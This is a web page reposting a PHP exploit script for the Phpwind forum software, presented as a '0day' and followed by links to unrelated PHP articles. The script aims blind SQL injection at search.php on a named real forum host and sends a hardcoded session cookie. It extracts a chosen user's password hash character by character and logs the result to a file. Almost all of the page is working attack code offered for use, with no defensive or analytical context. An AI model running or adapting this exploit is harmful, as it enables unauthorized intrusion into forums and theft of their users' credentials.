<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title>Codz By 剑心</title>

<style type="text/css">

body,td {

font-family: "Tahoma";

font-size: "12px";

line-height: "150%";

}

.smlfont {

font-family: "Tahoma";

font-size: "11px";

}

.INPUT {

FONT-SIZE: "12px";

COLOR: "#000000";

BACKGROUND-COLOR: "#FFFFFF";

height: "18px";

border: "1px solid #666666";

padding-left: "2px";

}

.redfont {

COLOR: "#A60000";

}

a:link,a:visited,a:active {

color: "#000000";

text-decoration: underline;

}

a:hover {

color: "#465584";

text-decoration: none;

}

.top {BACKGROUND-COLOR: "#CCCCCC"}

.firstalt {BACKGROUND-COLOR: "#EFEFEF"}

.secondalt {BACKGROUND-COLOR: "#F5F5F5"}

</style>

<center>The Exploiet Of The All Phpwind Version</center>

<center> BY 剑心</center>

<br>

<br>

<br>

<br>

<br>

<?php

ini_set("max_execution_time",0);

error_reporting(7);

$path="/search.php";

$server='bbs.ccidnet.com';

$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;

$_GET['uid']&&$uid=$_GET['uid'];

$tid=539264;

$mask='没有查找匹配的内容';

$count=0;

//$testing=1;

//$testing=$_GET['test'];

if($testing) {preg_match('/X-Powered-By: php/(.+)rn/ie',send(""),$php);echo$php[1];die();}

//$debug=1;

$temp=md5(rand(1,100)+microtime());

$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";

$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];

if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";

else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");

else {echo "Maybe It is not vul!<br>";die();}

echo "Try to Get the uid=$uid 's Password:<font color=red>";

$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)

{

$type=0;

$sub=$i+9;

$temp=md5(rand(1,100)+microtime());

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";

$sql=urlencode($sql);

$temp=md5(rand(1,100)+microtime());

$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

if(!strpos(send($cmd),$mask)) {

$type=0;

for($m=48;$m<=57;$m++){

$temp=md5(rand(1,100)+microtime());

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";

$sql=urlencode($sql);

$temp=md5(rand(1,100)+microtime());

$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

if(!strpos(send($cmd),$mask)) {

echo chr($m);

fputs($log,chr($m));

break;

}

continue;

}

continue;

}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";

$sql=urlencode($sql);

$temp=md5(rand(1,10000)+microtime());

$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

if(!strpos(send($cmd),$mask)) {

$type=1;

for($m=97;$m<=122;$m++){

$temp=md5(rand(1,100)+microtime());

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";

$sql=urlencode($sql);

$temp=md5(rand(1,100)+microtime());

$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";

if(!strpos(send($cmd),$mask)) {

echo chr($m);

fputs($log,chr($m));

break;

}

continue;

}

continue;

}

echo "error!<br>";

die("Shit!May be the data you post is Not valid!Try anthor UIDrn");

}

fclose($log);

echo "<br>Done!We Post $count times!<br>";

function send($cmd)

{

global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;

$message = "POST ".$path."? HTTP/1.1rn";

$message .= "Accept: */*rn";

$message .= "Accept-Language: zh-cnrn";

$message .= "Referer: http://".$server.$path."rn";

$message .= "Content-Type: application/x-www-form-urlencodedrn";

$message .= "User-Agent: ".$useragent."rn";

$message .= "Host: ".$server."rn";

$message .= "Content-length: ".strlen($cmd)."rn";

$message .= "Connection: Keep-Alivern";

$message .= "Cookie: ".$cookie."rn";

$message .= "rn";

$message .= $cmd."rn";

$fd = fsockopen( $server, 80 );

fputs($fd,$message);

$resp = "<pre>";

while($fd&&!feof($fd)) {

$resp .= fread($fd,1024);

}

fclose($fd);

$resp .="</pre>";

if($debug) {echo $cmd;echo $resp;}

return $resp;

}

?>

【从网上搜到的phpwind 0day的代码】相关文章：

★ 如何限制访问者的ip(PHPBB的代码)

★ 我的论坛源代码(七)

★ 如何在HTML中嵌入PHP 代码

★ 我的论坛源代码(四)

★ PHP网上调查系统

★ 递归实现php数组转xml的代码分享

★ 写一段简单的PHP建立文件夹代码

★ PHP中把对象转换为关联数组代码分享

★ 操作Oracle的php类

★ 我的论坛源代码(六)